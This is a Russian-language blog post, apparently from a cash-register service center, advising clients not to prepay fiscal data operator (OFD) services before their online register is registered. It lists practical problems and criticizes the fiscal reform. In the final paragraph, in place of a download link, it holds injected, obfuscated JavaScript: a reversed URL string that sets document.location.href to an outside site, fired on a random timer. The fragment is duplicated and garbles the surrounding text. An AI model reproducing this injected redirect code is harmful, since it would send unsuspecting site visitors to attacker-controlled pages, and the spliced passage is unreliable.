Не спешите оплачивать услуги ОФД

Во всяком случае, до того, как ваша касса зарегистрирована (после этого оплату счета лучше не откладывать). Уважаемые клиенты, последнее время мы иногда сталкиваемся со следующей ситуацией: заказанные комплекты модернизации и фискальные накопители приходят от поставщиков, и мы готовы оказывать услуги по регистрации онлайн-кассы и вводу ее в эксплуатацию, но оказывается, что клиентом заранее оплачены услуги какого-либо оператора фискальных данных (ОФД). Обычно счета на эти услуги предоставляются операторами электронной отчетности. Услуги ОФД в любом случае нужны, и, по идее, любую онлайн-кассу можно легко подключить к любому ОФД. По идее. Идее авторов плохо продуманной и провально реализуемой реформы, вынужденными участниками которой мы все сейчас являемся (сейчас модернизировано не более 15% парка ККТ страны, а до 1 июля осталось меньше 3 месяцев). Проблемы же возникают следующие.

1) Мы стараемся модернизировать технику за один рабочий день: утром снять ее с учета, днем доработать и до вечера зарегистрировать. Иногда сайты ОФД «лежат» часами (бывало и днями). Когда нет жесткой необходимости подключать аппарат к определенному ОФД, всегда есть возможность выбрать резервный вариант. Если же ваши деньги на год вперед уже уплачены в ОФД, выбора нет, придется ждать, пока сервис заработает.

2) Когда возникает реальная проблема с подключением конкретной кассы к ОФД, техподдержка производителя ККТ не всегда с пониманием относится к желанию подключить кассу к не связанному с этим производителем ОФД.

3) Самое существенное, если касса после регистрации оказывается у нас на обслуживании, а связь с ФНС поддерживает ОФД, агентом которого наша фирма не является, это снижает наши возможности по комплексному обслуживанию вашей техники.

4) Обязательства тех, кто заранее продаст Вам услуги ОФД, ограничиваются передачей Вам счета на оплату. В случае возникновения проблем с передачей фискальных данных, максимальной помощью, которую Вам сможет оказать оператор электронной отчетности, будет вручение номера телефона всероссийской техподдержки. На сервисные центры (на нас) же возложена функция первой линии техподдержки ОФД, разрабатывается функционал для удобного мониторинга беспроблемной эксплуатации обслуживаемых касс.

Кстати, не все, кто называет себя ОФД, таковым является. toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors/»>Здесь можно скачать актуальный список юридических лиц, получивших разрешение на обработку фискальных данных.

Image-register-8-e1477025517798-1200x672